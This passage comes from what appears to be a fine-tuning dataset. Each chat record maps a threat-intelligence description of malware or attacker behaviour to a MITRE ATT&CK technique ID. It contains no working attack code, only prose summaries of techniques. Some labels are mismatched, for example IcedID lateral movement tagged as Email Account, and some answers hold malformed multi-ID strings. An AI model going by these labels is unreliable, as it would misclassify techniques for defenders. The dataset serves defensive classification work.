- "content": "Pupy uses PsExec to execute a payload or commands on a remote host."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp uses Python scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has run hostname and systeminfo on a victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon can use mshta.exe to execute an HTA file hosted on a remote server."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can delete its dropper component from the targeted system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has used a custom MBR wiper named BOOTWRECK, which will initiate a system reboot after wiping the victim's MBR."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can create a new service using the service parser function ProcessScCommand."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbon uses HTTP to send data to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox can download files from Dropbox using a hardcoded access token."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to exfiltrate data from a network segment not connected to the Internet, the threat actor deployed a modified version of hTran. This ‘connection bouncer’ tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic. There have been numerous reports of hTran being used by different Chinese threat actors, including: APT3, APT27 and DragonOK"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main similarities include the use of a scheduled task to persistently execute on the system, as well as the same general process to communicate with its C2 server"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack. Once the threat actor regains their foothold, they already have access to a high-privileged domain user account"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some samples have a module to extract email from Microsoft Exchange servers using compromised credentials."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts', 'T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the local IP address of the victim and sends it to the C2."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea collects address book information from Outlook."
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "2, 2018, we published a blog detailing the use of an Adobe Flash zero-day vulnerability (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper)"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In october 2016 Group-IB published the report about the Cobalt group. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. However, when there is use of a security policy that prohibits the transfer of encrypted archives, such an email message may be blocked, so the attackers would send .doc files that contain exploits for Microsoft Office (fig. For organizations that perform timely updates of their systems and adhere to strict security policies, the Cobalt group employs another method to deliver malicious code through emails with Word documents containing a malicious macro. Therefore, the Cobalt group registered domains are similar to real ones (for example, diebold.pw), and configured their email server to distribute acting as these legitimate domains (fig. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. Additional means of circumventing anti-virus tools include the use of exploits to increase the level of rights and privileges, bypassing UAC, and injecting code into trusted processes. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "33 Download specified file to %TEMP%\\up and execute it in a new process During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser is capable of spawning a reverse shell on a victim."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection. We observed the use of two signers during our research, as shown below in Figure 1"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The command handle looks for the following command strings in Table 3: Command Description $fileDownload Uploads the contents of a specified file to C2 $importModule Adds a specified PowerShell module to the current script $screenshot Executes the contents of the command, which should be the string ‘$screenshot’"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke steals user files from local hard drives with file extensions that match a predefined list."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID’s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers"
- },
- {
- "role": "assistant",
- "content": "T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of a known adversary communicating to several external devices. Further research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device"
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can enumerate the current network connections of a host."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke C2 traffic is base64-encoded."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork has used watering holes to deliver files with exploits to initial victims."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a command to collect the victim MAC address and LAN IP."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This malware family used the new mutex ‘com_mycompany_apps_appname_new’. This variant of BADNEWS uses different filenames compared to previous versions. All of these files reside in the victim’s %TEMP% directory: Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers. BADNEWS performs many of the expected functions associated with previous versions including keylogging and identifying files of interest. Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files. It continues to seek out files with the following extensions: In order to prepare for C2 communication, BADNEWS will aggregate various victim information, which is appended to two strings. C2 communication is also updated from prior versions, with the following commands now supported by BADNEWS: During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP. Through the use of relatively new exploits, as well as a constantly evolving malware toolset, they aim to compromise prominent organizations and individuals to further their goals. One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PLEAD has used RC4 encryption to download modules."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EvilBunny has created Registry keys for persistence in \"[HKLM|HKCU]\\…\\CurrentVersion\\Run\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence through a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This report provides background on Windows container vulnerabilities, gives a technical overview of Siloscape and offers recommendations on best practices for securing Windows containers"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has searched for security products on infected machines."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can download files to the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system’s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware’s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can set a Registry key to determine how long it has been installed and possibly to indicate the version number."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The IRC variant of MPK has a command set (Table 2) that makes this an effective backdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate and interact with the file system, to run arbitrary commands, and to download and execute additional tools on the system"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BackdoorDiplomacy has used web shells to establish an initial foothold and for lateral movement within a victim's system."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor has the ability to search for Kaspersky Antivirus on a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CHOPSTICK is capable of performing remote command execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see “Global Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX_OCEANLOTUS.D has a command to download and execute a file on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lateral movement began around 28 hours after initial entry, using SMB to drop a Cobalt Strike Beacon on a domain controller. From there, the threat actor used WMIC to execute the beacon"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can check for Internet connectivity by contacting bing[.]com with the request format `bing[.]com?id=`."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used the \"net view\" command."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hard Disk Check The Trojan will perform the following WMI query: Select * from Win32_DiskDrive The Trojan will check the Caption and Model fields in the results for the strings Virtual, VMWare, VM, VBox or Oracle"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads several additional files and saves them to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi gathers and exfiltrates keystrokes from the machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lateral movement can be done with through net use commands to connect to the on remote systems."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encrypts some of its files with XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT has used HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PolyglotDuke can custom encrypt strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WinMM uses HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used JuicyPotato to abuse the \"SeImpersonate\" token privilege to escalate from web application pool accounts to NT Authority\\SYSTEM."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has used the \"ShowLocalGroupDetails\" command to identify administrator, user, and guest accounts on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a tool to infect connected USB devices and transmit itself to air-gapped computers when the infected USB device is inserted."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use domain generation algorithms in C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1568.002 - Domain Generation Algorithms"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti Group used a rootkit to modify typical server functionality."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can interact with a victim’s Outlook session and look through folders and emails."
- },
- {
- "role": "assistant",
- "content": "T1114 - Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The hooked WriteFile procedure’s main purpose is to save the file handle of the subject file to write and install another hook in the CloseHandle API function"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As part of the data reconnaissance phase, Proxysvc grabs the system time to send back to the control server."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CTU analysis indicates that BRONZE BUTLER primarily targets organizations located in Japan. The threat group has sought unauthorized access to networks of organizations associated with critical infrastructure, heavy industry, manufacturing, and international relations. Secureworks analysts have observed BRONZE BUTLER exfiltrating the following categories of data"
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive', 'T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Implant Type – WaterBear is a stage-2 implant with many capabilities; BendyBear is a stage-0 downloader"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
